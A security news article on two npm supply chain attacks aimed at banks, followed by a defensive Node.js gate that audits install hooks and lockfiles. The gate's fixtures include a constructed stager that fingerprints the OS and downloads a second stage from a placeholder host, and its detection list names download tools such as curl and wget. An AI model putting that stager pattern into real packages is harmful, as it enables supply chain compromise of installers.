For the first time, the banking sector has been explicitly targeted by two distinct open-source software (OSS) supply chain attacks aimed at stealthily planting malicious code in the banks' web assets. The development comes at a time when organizations across the globe are still recovering from the MOVEit Transfer hack, underscoring how much risk the software supply chain carries.
Both attacks were discovered in the first half of 2023 and showcase advanced techniques, such as targeting specific components of a victim bank's web assets and attaching malicious functionality to them.
Unveiling the first incident
The first attack took place between April 5 and April 7. A threat actor posing as an employee of the target bank uploaded a pair of malicious packages to the NPM registry, each containing a preinstall script (an npm lifecycle hook that runs automatically when the package is installed). To avoid suspicion, the attacker had also created a fake LinkedIn profile for the purported bank employee.
Once executed, the script identified the victim's operating system (Windows, Linux, or macOS) and downloaded second-stage malware from a remote server hosted on an Azure subdomain that incorporated the name of the target bank, which made the download traffic look legitimate to anyone reviewing it.
For the second stage, the attacker used Havoc, an open-source command-and-control (C2) and post-exploitation framework, which helped the payload evade defenses such as Windows Defender.
About the second incident
In the second attack, detected in February, the adversary added malicious code to an NPM package that was designed to blend into the victim bank's website and remain dormant until it was triggered.
The malicious code was built to covertly intercept login data entered on the page and exfiltrate it to attacker-controlled infrastructure.
What does this indicate?
Traditionally, organizations have focused on scanning packages for vulnerabilities once they reach the build stage of the software development lifecycle (SDLC). Vulnerability scanning looks for known weaknesses; a freshly published package whose entire purpose is malicious has no CVE to find, so these practices are not enough in the face of today's threats.
As threat actors refine their tactics for software supply chain attacks, organizations need to shift to proactive strategies that keep malicious packages out of the SDLC in the first place.
That means protective measures integrated into every stage of the lifecycle rather than a single scan at build time: vetting dependencies before they are added, controlling what install-time scripts may run, and verifying where packages are resolved from.
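As an added illustration (example code written for this page, not code from the original article or from the researchers it describes), the following Node.js script shows the kind of pre-install gate the passage above calls for. It targets the mechanism used in the first incident, install-time lifecycle hooks that fingerprint the OS and fetch a second stage, and also checks a package-lock for packages resolved outside the expected registry or lacking an integrity hash. All package names, file contents and lock entries are constructed placeholders, and the regular expressions are heuristics chosen here, not a published detection signature.

```javascript
// Added example, not code from the original article or from any vendor it
// mentions. A dependency gate that (1) inspects npm install-time lifecycle
// hooks for stager-like behaviour and (2) checks a package-lock for packages
// fetched outside the expected registry or without an integrity hash.
// Package names, file contents and lock entries below are constructed.

// npm executes these hooks during `npm install` unless ignore-scripts is set.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristics for a first-stage downloader (OS detection, then a fetch from a
// remote host). A match warrants review, it is not proof of malice: native
// modules legitimately download prebuilt binaries at install time.
const SUSPICIOUS = [
  { re: /process\.platform|os\.platform\(|\buname\b/, why: 'OS fingerprinting' },
  { re: /https?:\/\/[^\s'"`]+/, why: 'downloads from a remote URL' },
  { re: /\b(curl|wget|Invoke-WebRequest|iwr)\b/, why: 'shell download tool' },
  { re: /\bnode\s+-e\b|\beval\(|new Function\(/, why: 'executes inline or fetched code' },
  { re: /base64|atob\(/, why: 'encoded payload' },
];

// manifest: parsed package.json. files: { filename: contents } for scripts the
// hook command refers to (e.g. "node setup.js"), so the payload file is scanned too.
function auditInstallHooks(manifest, files = {}) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const referenced = cmd.split(/\s+/).filter((tok) => tok in files).map((tok) => files[tok]);
    const text = [cmd, ...referenced].join('\n');
    const reasons = SUSPICIOUS.filter((s) => s.re.test(text)).map((s) => s.why);
    findings.push({
      package: manifest.name, hook, command: cmd, reasons,
      severity: reasons.length ? 'block' : 'review',
    });
  }
  return findings;
}

// lock: parsed package-lock.json (lockfileVersion 2 or 3, "packages" map).
function auditLockfile(lock, allowedHost = 'registry.npmjs.org') {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project itself
    const name = path.replace(/^.*node_modules\//, '');
    let host = null;
    try { host = new URL(entry.resolved || '').host; } catch { /* unresolvable */ }
    if (host !== allowedHost) {
      findings.push({ package: name, reason: `resolved from ${host || 'no URL'}`, severity: 'block' });
    }
    if (!entry.integrity) {
      findings.push({ package: name, reason: 'missing integrity hash', severity: 'block' });
    }
    if (entry.hasInstallScript) {
      findings.push({ package: name, reason: 'declares an install script', severity: 'review' });
    }
  }
  return findings;
}

// Overall verdict: anything rated 'block' fails the gate; 'review' items are reported only.
function gate(manifests, files, lock) {
  const findings = [
    ...manifests.flatMap((m) => auditInstallHooks(m, files)),
    ...auditLockfile(lock),
  ];
  return { allow: findings.every((f) => f.severity !== 'block'), findings };
}

// Constructed samples (placeholders, not the real packages from the incident).
const SAMPLE_MALICIOUS = {
  name: 'examplebank-internal-utils',
  version: '1.0.3',
  scripts: { preinstall: 'node setup.js' },
};
const SAMPLE_FILES = {
  'setup.js': [
    "const stage = { win32: 'w', linux: 'l', darwin: 'm' }[process.platform];",
    "require('https').get('https://examplebank.example/s2/' + stage, (r) => r.pipe(process.stdout));",
  ].join('\n'),
};
const SAMPLE_BENIGN = { name: 'tidy-strings', version: '2.0.0', scripts: { test: 'node test.js' } };
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'bank-web' },
    'node_modules/examplebank-internal-utils': {
      version: '1.0.3',
      resolved: 'https://registry.npmjs.org/examplebank-internal-utils/-/examplebank-internal-utils-1.0.3.tgz',
      integrity: 'sha512-AAAA', // constructed placeholder digest
      hasInstallScript: true,
    },
    'node_modules/tidy-strings': {
      version: '2.0.0',
      resolved: 'https://registry.npmjs.org/tidy-strings/-/tidy-strings-2.0.0.tgz',
      integrity: 'sha512-BBBB', // constructed placeholder digest
    },
    'node_modules/vendored-widget': {
      version: '0.1.0',
      resolved: 'https://cdn.examplebank.example/vendored-widget-0.1.0.tgz', // not the registry, no integrity
    },
  },
};

console.log(JSON.stringify(gate([SAMPLE_MALICIOUS, SAMPLE_BENIGN], SAMPLE_FILES, SAMPLE_LOCK), null, 2));
```

Run it with `node gate.js`; in CI the same functions would be fed the package.json files of the resolved dependency tree and the project's lockfile. It complements, rather than replaces, `ignore-scripts=true` in .npmrc (or `npm ci --ignore-scripts`), which stops npm from running lifecycle hooks at all and would have kept the first-stage script in the April incident from executing during installation.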
Conclusion
Banks and other financial services organizations remain a lucrative target for cyber intruders because of the financial assets and sensitive data at stake, and researchers anticipate a steady escalation in targeted attacks on such entities. Organizations should therefore invest in early threat alerting and intelligence-sharing platforms so that they can identify such risks promptly and assess them in real time.